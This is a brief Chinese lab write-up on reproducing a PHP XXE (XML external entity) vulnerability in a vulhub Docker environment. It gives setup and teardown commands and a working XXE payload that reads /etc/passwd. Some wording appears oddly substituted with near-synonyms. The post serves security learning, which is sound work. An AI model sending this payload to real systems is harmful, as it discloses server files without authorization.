这个实验比较大略,就复现一个XXE漏洞,读取passwd文件,个中实行系统命令、内网探测不好复现。XXE(XML External Entity,XML 外部实体注入)当许可引用外部实体时,通过布局恶意内容,导致读取任意文件、实行系统命令、内网探测与攻击等危害的一类漏洞。
ailx10
网络安全精良回答者

网络安全硕士
去咨询
条件:准备好docker环境,下载好vulhub,进入目录 ,开始复现漏洞
docker-compose build //可选docker-compose up -d完成试验后,记得删除漏洞环境哦~~
docker-compose downdocker system prune -a -f //可选大略访问一下,解释PHP XXE漏洞环境搭建成功了
取出burpsuite,布局GET要求,读取本地文件
<?xml version = "1.0"?><!DOCTYPE ANY [ <!ENTITY xxe SYSTEM "file:///etc/passwd">]><x>&xxe;</x>